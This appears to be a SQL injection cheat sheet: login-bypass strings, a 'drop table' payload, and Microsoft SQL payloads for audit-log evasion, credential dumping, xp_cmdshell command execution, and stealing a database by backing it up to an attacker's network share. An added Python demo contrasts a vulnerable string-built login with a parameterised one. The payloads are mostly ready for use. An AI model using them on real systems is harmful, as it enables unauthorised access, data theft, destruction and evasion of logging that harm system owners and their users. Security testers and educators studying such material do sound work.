Generic – Bypass Authentication
The following payloads are generally applied to login forms with a username and password field. If the application is vulnerable, these inputs allow authentication to the web application (unless otherwise stated).

realusername' OR 1=1--
Authenticate as a real user without requiring a password.

' OR '' = '
Allows authentication without a valid username.

admin'--
Authenticate as user admin without a password.

' union select 1, 'user', 'pass' 1--
Requires knowledge of column names.

'; drop table users--
DANGEROUS! This will delete the user table (and the accounts in it) if the table name is 'users'.
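As an added illustration that is not part of the original cheat sheet, the Python below runs the bypass payloads above against two login functions over an in-memory SQLite table with constructed sample users: one builds the query by string formatting (the defect these payloads exploit), the other uses a parameterised query. The ' OR '' = ' payload is supplied in the password field; everything else is as listed above.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # Defect: untrusted input is spliced into the SQL text, so a quote or a
    # comment marker (--) in the input changes the structure of the query.
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Fix: a parameterised query sends values separately from the statement,
    # so the same inputs are compared as literal strings, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Return (vulnerable_result, safe_result) for one credential pair."""
    conn = make_db()
    return login_vulnerable(conn, username, password), login_safe(conn, username, password)


if __name__ == "__main__":
    for creds in [("admin'--", ""),
                  ("nobody", "' OR '' = '"),
                  ("alice' OR 1=1--", ""),
                  ("alice", "hunter2")]:
        print(creds, "->", compare(*creds))
```

Note that `alice' OR 1=1--` logs the vulnerable version in as whichever row the database returns first, not necessarily alice, which is why applications that read the username back from the submitted form rather than from the query result are the ones that yield a targeted bypass.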
Microsoft SQL
'admin --sp_password
sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (--) can prevent SQL Injection queries being logged.

select @@version
View database version.

select @@servername
Misc. information disclosure.

select @@microsoftversion
Misc. information disclosure.

select * from master..sysservers
Misc. information disclosure.

select * from sysusers
View database usernames and passwords.

exec master..xp_cmdshell 'ipconfig+/all'
Misc. command execution with xp_cmdshell.

exec master..xp_cmdshell 'net+view'
Misc. command execution with xp_cmdshell.

exec master..xp_cmdshell 'net+users'
Misc. command execution with xp_cmdshell.

exec master..xp_cmdshell 'ping+system-controlled-by-attacker'
Misc. command execution with xp_cmdshell. This is useful for blind SQL Injection tests (where no results are displayed).

BACKUP database master to disk='\\{IP}\{sharename}\backupdb.dat'
Backup entire database to a file. This attack can be used to steal a database.

create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"--
Reading files on the filesystem.

xp_servicecontrol (START or STOP)
Start and stop Windows Services.

str1 + str2 OR n+n
Concat strings for blind SQL Injection tests.